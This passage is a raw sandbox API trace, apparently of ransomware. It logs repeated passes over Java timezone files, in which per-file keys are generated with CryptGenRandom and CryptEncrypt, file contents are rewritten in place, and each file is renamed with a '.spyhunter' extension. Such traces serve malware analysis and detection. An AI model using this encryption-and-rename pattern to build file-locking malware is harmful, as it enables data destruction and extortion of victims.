(HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f098 [0169.748] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f098*, pdwDataLen=0x57e618*=0x20, dwBufLen=0x30 | out: pbData=0x31f098*, pdwDataLen=0x57e618*=0x30) returned 1 [0169.748] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Antarctica\\Davis" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\antarctica\\davis"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xa0 [0169.754] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Antarctica\\Davis") returned 60 [0169.754] StrStrW (lpFirst="Davis", lpSrch=".txt") returned 0x0 [0169.754] GetProcessHeap () returned 0x2c0000 [0169.754] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c375d8 [0169.754] ReadFile (in: hFile=0xa0, lpBuffer=0x2c375d8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x57e5dc, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesRead=0x57e5dc*=0x75, lpOverlapped=0x0) returned 1 [0169.755] SetFilePointerEx (in: hFile=0xa0, liDistanceToMove=0xffffff8b, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0169.755] WriteFile (in: hFile=0xa0, lpBuffer=0x2c375d8*, nNumberOfBytesToWrite=0x75, lpNumberOfBytesWritten=0x57e5dc, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesWritten=0x57e5dc*=0x75, lpOverlapped=0x0) returned 1 [0169.755] GetProcessHeap () returned 0x2c0000 [0169.755] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c375d8 | out: hHeap=0x2c0000) returned 1 [0169.755] SetFilePointerEx (in: hFile=0xa0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0169.755] WriteFile (in: hFile=0xa0, lpBuffer=0x57e61c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x57e5dc, lpOverlapped=0x0 | out: lpBuffer=0x57e61c*, lpNumberOfBytesWritten=0x57e5dc*=0x4, lpOverlapped=0x0) returned 1 [0169.755] WriteFile (in: hFile=0xa0, lpBuffer=0x31f098*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x57e5dc, lpOverlapped=0x0 | out: lpBuffer=0x31f098*, lpNumberOfBytesWritten=0x57e5dc*=0x30, lpOverlapped=0x0) returned 1 [0169.755] CloseHandle (hObject=0xa0) returned 1 [0169.755] GetProcessHeap () returned 0x2c0000 [0169.755] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x35f878 [0169.755] wnsprintfW (in: pszDest=0x35f878, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Antarctica\\Davis.spyhunter") returned 70 [0169.755] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Antarctica\\Davis" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\antarctica\\davis"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Antarctica\\Davis.spyhunter" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\antarctica\\davis.spyhunter")) returned 1 [0169.757] GetProcessHeap () returned 0x2c0000 [0169.757] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x35f878 | out: hHeap=0x2c0000) returned 1 [0169.758] GetProcessHeap () returned 0x2c0000 [0169.758] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f098 | out: hHeap=0x2c0000) returned 1 [0169.758] GetProcessHeap () returned 0x2c0000 [0169.758] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2eba688 | out: hHeap=0x2c0000) returned 1 [0169.758] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x57e620 | out: pbBuffer=0x57e620) returned 1 [0169.758] GetProcessHeap () returned 0x2c0000 [0169.758] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f098 [0169.758] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f098*, pdwDataLen=0x57e618*=0x20, dwBufLen=0x30 | out: pbData=0x31f098*, pdwDataLen=0x57e618*=0x30) returned 1 [0169.758] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\Tegucigalpa" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\america\\tegucigalpa"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xa0 [0169.758] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\Tegucigalpa") returned 63 [0169.758] StrStrW (lpFirst="Tegucigalpa", lpSrch=".txt") returned 0x0 [0169.758] GetProcessHeap () returned 0x2c0000 [0169.759] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c375d8 [0169.759] ReadFile (in: hFile=0xa0, lpBuffer=0x2c375d8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x57e5dc, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesRead=0x57e5dc*=0x79, lpOverlapped=0x0) returned 1 [0169.759] SetFilePointerEx (in: hFile=0xa0, liDistanceToMove=0xffffff87, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0169.759] WriteFile (in: hFile=0xa0, lpBuffer=0x2c375d8*, nNumberOfBytesToWrite=0x79, lpNumberOfBytesWritten=0x57e5dc, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesWritten=0x57e5dc*=0x79, lpOverlapped=0x0) returned 1 [0169.759] GetProcessHeap () returned 0x2c0000 [0169.760] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c375d8 | out: hHeap=0x2c0000) returned 1 [0169.760] SetFilePointerEx (in: hFile=0xa0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0169.760] WriteFile (in: hFile=0xa0, lpBuffer=0x57e61c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x57e5dc, lpOverlapped=0x0 | out: lpBuffer=0x57e61c*, lpNumberOfBytesWritten=0x57e5dc*=0x4, lpOverlapped=0x0) returned 1 [0169.760] WriteFile (in: hFile=0xa0, lpBuffer=0x31f098*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x57e5dc, lpOverlapped=0x0 | out: lpBuffer=0x31f098*, lpNumberOfBytesWritten=0x57e5dc*=0x30, lpOverlapped=0x0) returned 1 [0169.760] CloseHandle (hObject=0xa0) returned 1 [0169.760] GetProcessHeap () returned 0x2c0000 [0169.760] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x35f878 [0169.760] wnsprintfW (in: pszDest=0x35f878, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\Tegucigalpa.spyhunter") returned 73 [0169.760] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\Tegucigalpa" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\america\\tegucigalpa"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\Tegucigalpa.spyhunter" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\america\\tegucigalpa.spyhunter")) returned 1 [0169.762] GetProcessHeap () returned 0x2c0000 [0169.762] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x35f878 | out: hHeap=0x2c0000) returned 1 [0169.762] GetProcessHeap () returned 0x2c0000 [0169.762] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f098 | out: hHeap=0x2c0000) returned 1 [0169.762] GetProcessHeap () returned 0x2c0000 [0169.762] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ed5c58 | out: hHeap=0x2c0000) returned 1 [0169.763] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x57e618 | out: pbBuffer=0x57e618) returned 1 [0169.763] GetProcessHeap () returned 0x2c0000 [0169.763] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f098 [0169.763] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f098*, pdwDataLen=0x57e610*=0x20, dwBufLen=0x30 | out: pbData=0x31f098*, pdwDataLen=0x57e610*=0x30) returned 1 [0169.763] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\Swift_Current" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\america\\swift_current"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xa0 [0169.763] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\Swift_Current") returned 65 [0169.763] StrStrW (lpFirst="Swift_Current", lpSrch=".txt") returned 0x0 [0169.763] GetProcessHeap () returned 0x2c0000 [0169.763] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c375d8 [0169.763] ReadFile (in: hFile=0xa0, lpBuffer=0x2c375d8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x57e5d4, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesRead=0x57e5d4*=0xf1, lpOverlapped=0x0) returned 1 [0169.764] SetFilePointerEx (in: hFile=0xa0, liDistanceToMove=0xffffff0f, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0169.764] WriteFile (in: hFile=0xa0, lpBuffer=0x2c375d8*, nNumberOfBytesToWrite=0xf1, lpNumberOfBytesWritten=0x57e5d4, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesWritten=0x57e5d4*=0xf1, lpOverlapped=0x0) returned 1 [0169.764] GetProcessHeap () returned 0x2c0000 [0169.764] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c375d8 | out: hHeap=0x2c0000) returned 1 [0169.764] SetFilePointerEx (in: hFile=0xa0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0169.765] WriteFile (in: hFile=0xa0, lpBuffer=0x57e614*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x57e5d4, lpOverlapped=0x0 | out: lpBuffer=0x57e614*, lpNumberOfBytesWritten=0x57e5d4*=0x4, lpOverlapped=0x0) returned 1 [0169.765] WriteFile (in: hFile=0xa0, lpBuffer=0x31f098*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x57e5d4, lpOverlapped=0x0 | out: lpBuffer=0x31f098*, lpNumberOfBytesWritten=0x57e5d4*=0x30, lpOverlapped=0x0) returned 1 [0169.765] CloseHandle (hObject=0xa0) returned 1 [0169.765] GetProcessHeap () returned 0x2c0000 [0169.765] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x35f878 [0169.765] wnsprintfW (in: pszDest=0x35f878, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\Swift_Current.spyhunter") returned 75 [0169.765] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\Swift_Current" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\america\\swift_current"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\Swift_Current.spyhunter" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\america\\swift_current.spyhunter")) returned 1 [0169.766] GetProcessHeap () returned 0x2c0000 [0169.766] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x35f878 | out: hHeap=0x2c0000) returned 1 [0169.766] GetProcessHeap () returned 0x2c0000 [0169.766] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f098 | out: hHeap=0x2c0000) returned 1 [0169.766] GetProcessHeap () returned 0x2c0000 [0169.766] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2e04e08 | out: hHeap=0x2c0000) returned 1 [0169.766] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x57e618 | out: pbBuffer=0x57e618) returned 1 [0169.766] GetProcessHeap () returned 0x2c0000 [0169.766] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f098 [0169.766] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f098*, pdwDataLen=0x57e610*=0x20, dwBufLen=0x30 | out: pbData=0x31f098*, pdwDataLen=0x57e610*=0x30) returned 1 [0169.766] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\St_Vincent" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\america\\st_vincent"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xa0 [0169.767] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\St_Vincent") returned 62 [0169.767] StrStrW (lpFirst="St_Vincent", lpSrch=".txt") returned 0x0 [0169.767] GetProcessHeap () returned 0x2c0000 [0169.767] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c375d8 [0169.767] ReadFile (in: hFile=0xa0, lpBuffer=0x2c375d8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x57e5d4, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesRead=0x57e5d4*=0x41, lpOverlapped=0x0) returned 1 [0169.768] SetFilePointerEx (in: hFile=0xa0, liDistanceToMove=0xffffffbf, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0169.768] WriteFile (in: hFile=0xa0, lpBuffer=0x2c375d8*, nNumberOfBytesToWrite=0x41, lpNumberOfBytesWritten=0x57e5d4, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesWritten=0x57e5d4*=0x41, lpOverlapped=0x0) returned 1 [0169.768] GetProcessHeap () returned 0x2c0000 [0169.768] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c375d8 | out: hHeap=0x2c0000) returned 1 [0169.768] SetFilePointerEx (in: hFile=0xa0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0169.768] WriteFile (in: hFile=0xa0, lpBuffer=0x57e614*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x57e5d4, lpOverlapped=0x0 | out: lpBuffer=0x57e614*, lpNumberOfBytesWritten=0x57e5d4*=0x4, lpOverlapped=0x0) returned 1 [0169.768] WriteFile (in: hFile=0xa0, lpBuffer=0x31f098*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x57e5d4, lpOverlapped=0x0 | out: lpBuffer=0x31f098*, lpNumberOfBytesWritten=0x57e5d4*=0x30, lpOverlapped=0x0) returned 1 [0169.768] CloseHandle (hObject=0xa0) returned 1 [0169.768] GetProcessHeap () returned 0x2c0000 [0169.768] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x35f878 [0169.769] wnsprintfW (in: pszDest=0x35f878, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\St_Vincent.spyhunter") returned 72 [0169.769] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\St_Vincent" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\america\\st_vincent"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\St_Vincent.spyhunter" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\america\\st_vincent.spyhunter")) returned 1 [0169.769] GetProcessHeap () returned 0x2c0000 [0169.769] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x35f878 | out: hHeap=0x2c0000) returned 1 [0169.769] GetProcessHeap () returned 0x2c0000 [0169.769] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f098 | out: hHeap=0x2c0000) returned 1 [0169.770] GetProcessHeap () returned 0x2c0000 [0169.770] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ed5b90 | out: hHeap=0x2c0000) returned 1 [0169.770] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x57e610 | out: pbBuffer=0x57e610) returned 1 [0169.770] GetProcessHeap () returned 0x2c0000 [0169.770] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f098 [0169.770] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f098*, pdwDataLen=0x57e608*=0x20, dwBufLen=0x30 | out: pbData=0x31f098*, pdwDataLen=0x57e608*=0x30) returned 1 [0169.770] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\St_Thomas" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\america\\st_thomas"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xa0 [0169.770] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\St_Thomas") returned 61 [0169.770] StrStrW (lpFirst="St_Thomas", lpSrch=".txt") returned 0x0 [0169.770] GetProcessHeap () returned 0x2c0000 [0169.770] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c375d8 [0169.770] ReadFile (in: hFile=0xa0, lpBuffer=0x2c375d8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x57e5cc, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesRead=0x57e5cc*=0x41, lpOverlapped=0x0) returned 1 [0169.771] SetFilePointerEx (in: hFile=0xa0, liDistanceToMove=0xffffffbf, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0169.771] WriteFile (in: hFile=0xa0, lpBuffer=0x2c375d8*, nNumberOfBytesToWrite=0x41, lpNumberOfBytesWritten=0x57e5cc, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesWritten=0x57e5cc*=0x41, lpOverlapped=0x0) returned 1 [0169.771] GetProcessHeap () returned 0x2c0000 [0169.771] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c375d8 | out: hHeap=0x2c0000) returned 1 [0169.771] SetFilePointerEx (in: hFile=0xa0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0169.772] WriteFile (in: hFile=0xa0, lpBuffer=0x57e60c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x57e5cc, lpOverlapped=0x0 | out: lpBuffer=0x57e60c*, lpNumberOfBytesWritten=0x57e5cc*=0x4, lpOverlapped=0x0) returned 1 [0169.772] WriteFile (in: hFile=0xa0, lpBuffer=0x31f098*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x57e5cc, lpOverlapped=0x0 | out: lpBuffer=0x31f098*, lpNumberOfBytesWritten=0x57e5cc*=0x30, lpOverlapped=0x0) returned 1 [0169.772] CloseHandle (hObject=0xa0) returned 1 [0169.772] GetProcessHeap () returned 0x2c0000 [0169.772] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x35f878 [0169.772] wnsprintfW (in: pszDest=0x35f878, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\St_Thomas.spyhunter") returned 71 [0169.772] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\St_Thomas" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\america\\st_thomas"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\St_Thomas.spyhunter" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\america\\st_thomas.spyhunter")) returned 1 [0169.773] GetProcessHeap () returned 0x2c0000 [0169.773] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x35f878 | out: hHeap=0x2c0000) returned 1 [0169.773] GetProcessHeap () returned 0x2c0000 [0169.773] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f098 | out: hHeap=0x2c0000) returned 1 [0169.773] GetProcessHeap () returned 0x2c0000 [0169.773] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ed5ac8 | out: hHeap=0x2c0000) returned 1 [0169.773] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x57e610 | out: pbBuffer=0x57e610) returned 1 [0169.773] GetProcessHeap () returned 0x2c0000 [0169.773] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f098 [0169.773] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f098*, pdwDataLen=0x57e608*=0x20, dwBufLen=0x30 | out: pbData=0x31f098*, pdwDataLen=0x57e608*=0x30) returned 1 [0169.773] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\St_Lucia" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\america\\st_lucia"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xa0 [0169.774] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\St_Lucia") returned 60 [0169.774] StrStrW (lpFirst="St_Lucia", lpSrch=".txt") returned 0x0 [0169.774] GetProcessHeap () returned 0x2c0000 [0169.774] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c375d8 [0169.774] ReadFile (in: hFile=0xa0, lpBuffer=0x2c375d8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x57e5cc, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesRead=0x57e5cc*=0x41, lpOverlapped=0x0) returned 1 [0169.775] SetFilePointerEx (in: hFile=0xa0, liDistanceToMove=0xffffffbf, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0169.775] WriteFile (in: hFile=0xa0, lpBuffer=0x2c375d8*, nNumberOfBytesToWrite=0x41, lpNumberOfBytesWritten=0x57e5cc, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesWritten=0x57e5cc*=0x41, lpOverlapped=0x0) returned 1 [0169.775] GetProcessHeap () returned 0x2c0000 [0169.775] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c375d8 | out: hHeap=0x2c0000) returned 1 [0169.775] SetFilePointerEx (in: hFile=0xa0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0169.775] WriteFile (in: hFile=0xa0, lpBuffer=0x57e60c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x57e5cc, lpOverlapped=0x0 | out: lpBuffer=0x57e60c*, lpNumberOfBytesWritten=0x57e5cc*=0x4, lpOverlapped=0x0) returned 1 [0169.775] WriteFile (in: hFile=0xa0, lpBuffer=0x31f098*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x57e5cc, lpOverlapped=0x0 | out: lpBuffer=0x31f098*, lpNumberOfBytesWritten=0x57e5cc*=0x30, lpOverlapped=0x0) returned 1 [0169.775] CloseHandle (hObject=0xa0) returned 1 [0169.775] GetProcessHeap () returned 0x2c0000 [0169.775] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x35f878 [0169.775] wnsprintfW (in: pszDest=0x35f878, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\St_Lucia.spyhunter") returned 70 [0169.775] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\St_Lucia" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\america\\st_lucia"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\St_Lucia.spyhunter" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\america\\st_lucia.spyhunter")) returned 1 [0169.780] GetProcessHeap () returned 0x2c0000 [0169.781] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x35f878 | out: hHeap=0x2c0000) returned 1 [0169.781] GetProcessHeap () returned 0x2c0000 [0169.781] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f098 | out: hHeap=0x2c0000) returned 1 [0169.781] GetProcessHeap () returned 0x2c0000 [0169.781] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ed5a00 | out: hHeap=0x2c0000) returned 1 [0169.781] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x57e608 | out: pbBuffer=0x57e608) returned 1 [0169.781] GetProcessHeap () returned 0x2c0000 [0169.781] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f098 [0169.781] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f098*, pdwDataLen=0x57e600*=0x20, dwBufLen=0x30 | out: pbData=0x31f098*, pdwDataLen=0x57e600*=0x30) returned 1 [0169.781] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\St_Kitts" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\america\\st_kitts"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xa0 [0169.782] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\St_Kitts") returned 60 [0169.782] StrStrW (lpFirst="St_Kitts", lpSrch=".txt") returned 0x0 [0169.782] GetProcessHeap () returned 0x2c0000 [0169.782] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c375d8 [0169.782] ReadFile (in: hFile=0xa0, lpBuffer=0x2c375d8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x57e5c4, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesRead=0x57e5c4*=0x41, lpOverlapped=0x0) returned 1 [0169.782] SetFilePointerEx (in: hFile=0xa0, liDistanceToMove=0xffffffbf, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0169.783] WriteFile (in: hFile=0xa0, lpBuffer=0x2c375d8*, nNumberOfBytesToWrite=0x41, lpNumberOfBytesWritten=0x57e5c4, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesWritten=0x57e5c4*=0x41, lpOverlapped=0x0) returned 1 [0169.783] GetProcessHeap () returned 0x2c0000 [0169.783] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c375d8 | out: hHeap=0x2c0000) returned 1 [0169.783] SetFilePointerEx (in: hFile=0xa0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 